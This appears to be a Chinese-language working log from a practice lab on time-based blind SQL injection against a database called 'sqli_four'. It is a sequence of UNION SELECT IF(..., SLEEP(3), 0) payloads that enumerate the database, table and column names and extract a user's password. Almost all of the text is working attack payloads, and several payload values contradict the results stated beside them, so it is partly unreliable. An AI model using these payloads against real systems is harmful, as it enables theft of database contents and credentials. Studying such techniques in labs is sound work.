猜数据库长度:9位
union select if(length(database())=9, sleep(3), 0), 2;--
猜数据库名:sqli_four
UNION SELECT IF(database()="sqli_four", SLEEP(3), 0), 2;--
猜数据库表数量:2
UNION SELECT IF((select count(table_name) from information_schema.tables where table_schema = database())=2, SLEEP(3), 0), 2;--
猜测表名长度: 表一:19位 表2:5位
UNION SELECT IF(length((select table_name from information_schema.tables where table_schema='sqli_four' limit 0,1))=8, SLEEP(3), 0), 2;--
猜表2表名:users
UNION SELECT IF(ascii(substr((select table_name from information_schema.tables where table_schema='sqli_four' limit 1,1),1,1))=101, SLEEP(3), 0), 2;--
猜第一列长度:2
UNION SELECT if(length((select column_name from information_schema.columns where table_schema='sqli_four' and table_name='users' limit 0,1))=2, sleep(3), 0), 2;--
猜第一列名:id
UNION SELECT if((select column_name from information_schema.columns where table_schema='sqli_four' and table_name='users' limit 0,1)="id", sleep(3), 0), 2;--
猜第二列长度:8
UNION SELECT if(length((select column_name from information_schema.columns where table_schema='sqli_four' and table_name='users' limit 1,1))=2, sleep(3), 0), 2;--
猜第二列名:password
UNION SELECT if((select column_name from information_schema.columns where table_schema='sqli_four' and table_name='users' limit 1,1)="password", sleep(3), 0), 2;--
查询有几个记录:1条
union select if((select count(id) from users)=1,sleep(3), 0), 2;--
查询第一个id长度:1
union select if(length((select id from sqli_four.users limit 0,1))=5, sleep(3), 0), 2;--
查询第一个id值:1
union select if((select id from sqli_four.users limit 0,1)=1, sleep(3), 0), 2;--
查询id=1的密码长度:4
union select if(length((select password from sqli_four.users limit 0,1))=4, sleep(3), 0), 2;--
查询id=1的密码值:4961
union select if(ascii(substr((select password from sqli_four.users limit 0,1),1,1))=101, sleep(3), 0), 2;--